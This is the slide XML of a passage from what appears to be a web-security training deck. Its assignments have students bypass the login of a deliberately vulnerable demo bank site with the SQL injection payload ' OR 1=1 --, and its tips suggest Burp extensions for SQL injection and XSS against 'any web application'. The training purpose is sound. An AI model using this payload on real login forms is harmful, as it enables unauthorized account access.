                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://demo.testfire.net/login.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hint: Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> payloads at login form</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="245504661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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick Assignment#6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit a vulnerable website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Login into the application using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> injection vulnerability/attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://demo.testfire.net/login.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hint: Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> payloads at login form ‘ OR 1=1 -- ; 1=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422384737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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick Assignment#7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit a vulnerable REST API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Login using REST API &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> injection vulnerability/attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get the REST API from website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hint: Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> payloads at login form ‘ OR 1=1 -- ; 1=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345522606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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HACK-TIP#1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Burp Store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Install Hack Bar  Explore it against previous assignments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Use any web application to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" indent="-1028700">
              <a:buAutoNum type="romanLcParenBoth"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>inject SQL injection and login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" indent="-1028700">
              <a:buAutoNum type="romanLcParenBoth"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>inject XSS payload and execute </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168195425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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HACK-TIP#2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Burp Store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Install XSS validator  Explore it against previous assignments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336363202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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HACK-TIP#3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Burp Store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Install Content type converter  Explore it against previous assignments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
